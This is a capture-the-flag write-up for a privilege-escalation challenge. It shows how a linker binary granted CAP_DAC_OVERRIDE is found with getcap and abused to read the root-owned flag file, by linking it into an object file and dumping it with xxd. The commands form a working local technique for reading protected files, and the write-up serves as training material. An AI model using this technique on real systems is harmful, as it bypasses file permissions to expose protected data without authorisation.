SINCON Wonderland CTF — Privilege Escalation (Points: 200)

One of the files on the machine was granted a capability in the permitted capability set.

Objective: By leveraging the capability provided to the file, escalate to root and retrieve the flag!

Use getcap to find out which program have “special” capability. Programs with CAP_DAC_OVERRIDE can bypass file read, write, and execute permission checks.

student@localhost:~$ getcap -r / 2>/dev/null
/usr/bin/x86_64-linux-gnu-ld.bfd = cap_dac_override+ep

Trying my luck to find out where the flag is stored.

student@localhost:~$ /usr/bin/x86_64-linux-gnu-ld.bfd /tmp/flag
/usr/bin/x86_64-linux-gnu-ld.bfd: cannot find /tmp/flag: No such file or directory
student@localhost:~$ /usr/bin/x86_64-linux-gnu-ld.bfd /root/flag
/usr/bin/x86_64-linux-gnu-ld.bfd:/root/flag: file format not recognized; treating as linker script
/usr/bin/x86_64-linux-gnu-ld.bfd:/root/flag:1: syntax error

How to use the linker to read arbitary files? Link them into a binary.

student@localhost:~$ /usr/bin/x86_64-linux-gnu-ld.bfd -r -b binary /root/flag -o flag.o

Then use xxd to see the flag in the built binary.

student@localhost:~$ xxd flag.o
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0100 3e00 0100 0000 0000 0000 0000 0000  ..>.............
00000020: 0000 0000 0000 0000 5001 0000 0000 0000  ........P.......
00000030: 0000 0000 4000 0000 0000 4000 0500 0400  ....@.....@.....
00000040: 3064 6233 3161 6562 3033 3936 6364 3839  0db31aeb0396cd89
00000050: 3664 6638 3732 6333 6132 3337 3039 3661  6df872c3a237096a
00000060: 0a00 0000 0000 0000 0000 0000 0000 0000  ................
...